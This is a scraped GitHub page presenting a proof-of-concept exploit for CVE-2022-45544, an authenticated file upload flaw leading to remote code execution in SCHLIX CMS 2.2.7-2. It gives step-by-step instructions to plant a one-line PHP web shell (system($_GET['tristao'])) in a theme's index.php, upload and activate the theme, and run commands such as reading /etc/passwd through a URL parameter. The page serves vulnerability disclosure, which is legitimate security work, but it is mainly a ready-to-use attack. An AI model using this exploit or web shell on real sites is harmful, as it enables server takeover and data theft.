Giters

tristao-marinho / CVE-2022-45544

SCHLIX CMS 2.2.7-2 arbitrary File Upload

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

CVE-2022-45544

SCHLIX CMS 2.2.7-2 arbitrary File Upload

#Title:Schlix CMS 2.2.7-2 | Arbitrary File Upload Remote following Code Execution (Authenticated)
#Date: 2022-11-09
#Author: Francisco Marinho
#Vendor Homepage: https://www.schlix.com/
#Software link:https://www.schlix.com/downloads/schlix-cms/schlix-cms-v2.2.7-2.zip
#Version: 2.2.7-2
#Tested on: Linux

=========================POC=========================


1 - Login with your account
2 - Acess the directory in url http://example.com/admin/app/core.thememanager
3 - Download theme Superhero in https://www.schlix.com/extensions.releases/action/download/filename/theme_superhero-1.1.zip
4 - Unzip theme_superhero-1.1.zip
5 - Edit file in path superhero/themes/superhero/index.php, adding "system($_GET['tristao']);" on line three.
6 - Zip theme_superhero-1.1.zip
7 - Click in "INSTALL A PACKAGE"
8 - Upload theme_superhero-1.1.zip
9 - Active theme superhero
10 - Acess homepage index.php

Examples:

cat /etc/passwd

http://example.com/index.php?tristao=cat%20%20/etc/passwd

ls -la

http://example.com/index.php?tristao=ls%20%20-la

Procedure video
https://www.youtube.com/watch?v=_0X6AzXmhrU&t=36s

About

SCHLIX CMS 2.2.7-2 arbitrary File Upload